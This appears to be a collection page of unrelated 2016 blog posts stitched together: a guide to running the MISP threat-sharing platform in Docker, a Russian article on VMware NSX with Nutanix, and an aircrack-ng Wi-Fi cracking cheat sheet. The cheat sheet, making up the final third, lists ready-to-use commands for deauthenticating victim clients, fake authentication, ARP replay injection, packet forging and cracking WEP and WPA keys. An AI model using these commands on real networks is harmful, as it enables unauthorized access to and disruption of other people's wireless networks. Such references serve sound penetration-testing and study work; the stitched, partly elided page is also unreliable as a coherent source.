04.03.2016

Malware Information Sharing Platform (MISP) on Doker

MISP (“Malware Information Sharing Platform“) is a free software which was initially created by the Belgian Defence to exchange IOC’s with partners like the NCIRC (NATO). Today it became an independent project and is mainly developed by a group of motivated people. MISP is mainly used by CERT’s (“Computer Emergency Response Team”) but also private companies to exchange thousands on IOC’s on a daily basis.

To build the Docker image:
# git clone https://github.com/xme/misp-docker
# cd misp-docker
# docker build -t misp/misp --build-arg MYSQL_ROOT_PASSWORD=<mysql_root_pw> .
# cat <<__END__ >env.txt
MYSQL_ROOT_PASSWORD=my_strong_root_pw
MYSQL_MISP_PASSWORD=my_strong_misp_pw
__END__
# docker run -d -p 443:443 --env-file=env.txt --restart=always --name misp misp/misp
Once the container booted, there are still some manual operations to perform. Feel free to fine-tune it to your needs if you already know the tool.
Change the ‘baseurl‘ parameter in /var/www/MISP/app/Config/config.php
Reconfigure Postfix to match your SMTP environment

To use MISP, point your browser to https://your-docker-server:443.

The files are available on my github.com repository.

03.03.2016

...

...

VMware NSX for vSphere и Nutanix Xtreme Computing Platform (XCP + NSX)

На примере ниже трафик подсистемы хранения передаётся между узлами (хостами) через VLAN 101, а трафик рабочих виртуальных машин, инкапсулированный в VXLAN, передаётся через VLAN 401.


NSX используется как для рабочей нагрузки, так и для Nutanix CVM.
В альтернативном варианте, показанном ниже, к сети NSX подключены как рабочие виртуальные машины, так и Nutanix CVM. Связь между CVM на разных узлах кластера Nutanix обеспечивается по виртуальной сети 5000. Адресация виртуальных адаптеров для управления и VXLAN, в приведённом примере, иллюстрирует ситуацию, когда два узла кластера находятся в разных серверных стойках, разделённых маршрутизатором. Инкапсуляция пакетов в VXLAN позволяет преодолеть это ограничение.




Заключение
Использование VMware NSX с Nutanix даёт системным администраторам возможность построения мощных и гибких решений, свободных от ограничений традиционных физических инфраструктур. Платформа Nutanix Xtreme Computing Platform (XCP) предоставляет вычислительные ресурсы и подсистему хранения, в то время как NSX создаёт виртуальную сетевую инфраструктуру, не привязанную к физическим сетевым компонентам. В Nutanix проверили, что оба эти компонента успешно интегрируются друг с другом в результате чего достигаются все преимущества, предоставляемые программно-определяемым ЦОД, включая логическое разделение инфраструктуры хранения, изоляцию виртуальных сетей, политики безопасности, перемещаемые вместе с виртуальными машинами и автоматизацию рабочих процессов.
Nutanix with VMware NSX позволяет администраторам сфокусироваться на построении масштабируемых приложений, так как вне зависимости от того, где работает виртуальная машина, она всегда будет иметь доступ к необходимым ресурсам. Стабильная и надёжная физическая инфраструктура предоставляет основу для гибкой и удобной виртуальной сети, всегда готовой к расширению при необходимости.

01.03.2016

Cheat - aircrack-ng

#Wifi Cheat Sheet - aircrack-ng
===============================

#Start Monitor Mode and Save captures
iw dev wlan0 add interface mon0 type monitor
airmon-ng start wlan0 <Chanel>
airodump-ng -c <Chanel> --bssid <MAC AP> -w <NameCapture> <InterfaceMonitor>

# To crack WEP for a given essid name and store into a file
aircrack-ng -a 1 -e <essid> -l <output file> <.cap or .ivs file(s)>

# To crack WPA/WPA2 from airolib-ng database
aircrack-ng -e <essid> -r <database> <.cap or .ivs file(s)>

# To crack WPA/WPA2 from a wordlist
aircrack-ng -e <essid> -w <wordlist> <.cap or .ivs file(s)>

# To crack a given bssid
aircrack-ng -b <bssid> -l <output file> <.cap or .ivs file(s)>

# To crack a given bssid using FMS/Korek method
aircrack-ng -K -b <bssid> <.cap or .ivs file(s)>

# To crack a given essid (WEP) and display the ASCII of the key
aircrack-ng -e <essid> -s <.cap of .ivs file(s)>

# To crack a given essid (WEP) and create a EWSA Project
aircrack-ng -e <essid> -E <EWSA file> <.cap or .ivs file(s)>

=== cracking WPA ====================================================================================================

airmon-ng start wlan0
airodump-ng -c (channel) –bssid (AP MAC) -w (filename) mon0
aireplay-ng -0 1 -a (AP MAC) -c (VIC CLIENT) mon0 {disassociation attack}
aircrack-ng -0 -w (wordlist path) (caputure filename)

=== cracking WEP with Connected Clients =============================================================================

airmon-ng start wlan0 ( channel)
airodump-ng -c (channel) –bssid (AP MAC) -w (filename) mon0
aireplay-ng -1 0 -e (ESSID) -a (AP MAC) -h (OUR MAC) mon0 {fake authentication}
aireplay-ng -0 1 -a (AP MAC) -c (VIC CLIENT) mon0 {disassociation attack}
aireplay-ng -3 -b (AP MAC) -h (OUR MAC) mon0 {ARP replay attack}

=== cracking WEP via a Client =======================================================================================

airmon-ng start wlan0 (channel)
airodump-ng -c (channel) –bssid (AP MAC) -w (filename) mon0
aireplay-ng -1 0 -e (ESSID) -a (AP MAC) -h (OUR MAC) mon0 {fake authentication}
aireplay-ng -2 -b (AP MAC) -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 mon0
aireplay-ng -2 -r (replay cap file) mon0 {inject using cap file}
aircrack-ng -0 -z(PTW) -n 64(64bit) filename.cap

=== ARP amplification ===============================================================================================

airmon-ng start wlan0 ( channel)
airodump-ng -c (channel) –bssid (AP MAC) -w (filename) mon0
aireplay-ng -1 500 -q 8 -a (AP MAC) mon0
areplay-ng -5 -b (AP MAC) -h (OUR MAC) mon0
packetforge-ng -0 -a (AP MAC) -h (OUR MAC) -k 255.255.255.255 -l 255.255.255.255 -y (FRAGMENT.xor) -w (filename.cap)
tcpdump -n -vvv -e -s0 -r (replay_dec.#####.cap)
packetforge-ng -0 -a (AP MAC) -h (OUR MAC) -k (destination IP) -l (source IP) -y (FRAGMENT.xor) -w (filename.cap)
aireplay-ng -2 -r (filename.cap) mon0

=== cracking WEP /w shared key AUTH =================================================================================

airmon-ng start wlan0 ( channel)
airodump-ng -c (channel) –bssid (AP MAC) -w (filename) mon0
~this will error out~aireplay-ng -1 0 -e (ESSID) -a (AP MAC) -h (OUR MAC) mon0 {fake authentication}
aireplay-ng -0 1 -a (AP MAC) -c (VIC CLIENT) mon0 {deauthentication attack}
aireplay-ng -1 60 -e (ESSID) -y (sharedkeyfile) -a (AP MAC) -h (OUR MAC) mon0 {fake authentication /w PRGA xor file}
aireplay-ng -3 -b (AP MAC) -h (OUR MAC) mon0 {ARP replay attack}
aireplay-ng -0 1 -a (AP MAC) -c (VIC CLIENT) mon0 {deauthentication attack}
aircrack-ng -0 -z(PTW) -n 64(64bit) filename.cap